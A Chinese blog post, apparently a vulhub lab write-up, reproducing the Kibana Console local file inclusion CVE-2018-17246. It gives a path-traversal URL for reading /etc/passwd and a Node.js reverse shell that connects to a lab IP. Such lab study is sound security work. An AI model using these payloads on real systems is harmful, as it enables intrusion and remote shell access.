Kibana本地文件包含 CVE-2018-17246 漏洞复现

最新推荐文章于 2024-05-31 09:46:21 发布
最新推荐文章于 2024-05-31 09:46:21 发布
阅读量670 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114467684
版权

Kibana本地文件包含(CVE-2018-17246)

by ADummy

0x00利用路线

​ 最终漏洞的影响关键在于如何创建shell文件

0x01漏洞介绍

​ 此漏洞出现在Kibana控制台(Console)插件中,控制台插件是KIbana的基本插件,也就是Kibana必装的插件。当前elastic最新版本为6.5,可以说大部分elk的组件会存在此问题,但是此问题利用难点在于如何创建一个恶意的本地文件

影响版本

Kibana <= 5.6.13
Kibana <= 6.4.3

0x02漏洞复现

http://192.168.1.3:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

在kibana的log中可以看到/etc/passwd的信息

docker-compose logs

要利用此漏洞,您需要将JavaScript Webshell上传到运行Kibana的计算机上,然后将其包含在内。

(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8080, "192.168.1.2", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();

http://192.168.0.142:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/shell.js

shell没弹回来- -
在这里插入图片描述

0x03参考资料

https://www.jianshu.com/p/417196b69e98

https://www.jianshu.com/p/417196b69e98

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kibana本地文件包含漏洞CVE-2018-17246复现
玄道的网安博客
03-09 2432
漏洞概述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。 影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 环境搭建 这里使用docker进行安装 https://github.c...
kibana-7.3.0-darwin-x86_64.zip
07-01
Kibana 是为 Elasticsearch设计的开源分析和可视化平台。你可以使用 Kibana 来搜索,查看存储在 Elasticsearch 索引中的数据并与之交互。你可以很容易实现高级的数据分析和可视化,以图标的形式展现出来。
kibana漏洞复现
Shanfenglan's blog
11-30 2333
文章目录1. kibana是什么2. CVE-2018-17246 文件包含漏洞2.1 利用3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)3.1 利用 1. kibana是什么 一般与Elasticsearch一起工作,作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用,可以通过5601端口去访问。 2. CVE-2018-17246 文件包含漏洞 影响版本: 5.6.13到6.4.3 2.1 利用 通常情况下Kibana
Kibana本地文件包含漏洞CVE-2018-17246
大方子
07-23 5119
影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 搭建过程 cd vulhub-master/kibana/CVE-2018-17246 docker-compose up -d 验证POC http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../
为您的安全保驾护航:CVE-2021-21985 漏洞检测与防护工具
最新发布
gitblog_00029的博客
05-31 377
为您的安全保驾护航:CVE-2021-21985 漏洞检测与防护工具 项目地址:https://gitcode.com/alt3kx/CVE-2021-21985_PoC 1、项目介绍 该项目是针对CVE-2021-21985的漏洞检测和防护工具。这是一个影响VMware vCenter Server的安全问题,由于Virtual SAN Health Check插件的输入验证不足,可能导致远程代...
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246
ahhacker86的专栏
01-23 1287
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
Ruby on Rails 路径穿越与任意文件读取漏洞CVE-2019-5418)
黑白的博客
12-14 343
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 824
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
vulhub漏洞复现34_Kibana
weixin_44193247的博客
02-08 428
vulhub漏洞复现练习篇
最新版linux kibana-8.10.2-linux-x86-64.tar.gz
09-23
最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-8.10.2-linux-x86_64.tar.gz最新版linux kibana-...
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
kibana-6.5.4-windows-x86_64.rar
04-07
kibana-6.5.4-windows-x86_64.rar kibana-6.5.4-windows-x86_64 windows版本, 启动之前请先启动 elasticsearch-6.5.4
最新版windows kibana-8.8.0-windows-x86-64.zip
05-29
最新版windows kibana-8.8.0-windows-x86_64.zip最新版windows kibana-8.8.0-windows-x86_64.zip最新版windows kibana-8.8.0-windows-x86_64.zip
kibana-6.8.4-linux-x86_64.tar.gz
05-16
这是一个针对64位Linux系统的归档文件,包含了Kibana的完整源代码。"tar.gz"是一种常见的文件打包格式,它是使用tar命令将所有文件打包后,再用gzip进行压缩,以减小文件体积,便于传输和存储。 在安装Kibana之前,...
kibana-6.2.2-linux-x86_64.tar.gz.zip
08-18
解压完成后,你会得到一个名为`kibana-6.2.2-linux-x86_64`的目录,里面包含了Kibana的所有文件。 二、安装与配置 1. **Linux安装**: 在Linux上,你需要将Kibana的可执行文件路径添加到PATH环境变量中。首先,将...
CVE-2018-4878的复现
大方子
10-07 4326
前言: CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
KIBANA的一些测试操作
weixin_52634719的博客
09-04 331
GET xujiayin/user/_search { "query": { "match": { "tags": "爱许" } } } PUT testdb { "mappings": { "properties": { "name":{ "type":"text" }, "desc":{ "type": "keyword" } } } } GET tes...
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1154
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
kibana-7.4.0-windows-x86_64.zip
05-12
同时,该安装包还包含Kibana的所有核心组件,并在Windows操作系统下提供了使用Kibana的便捷方式。 总而言之,如果您正在寻找一种高效的方法来通过各种数据可视化技术处理和分析大量数据集合,那么Kibana-7.4.0-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值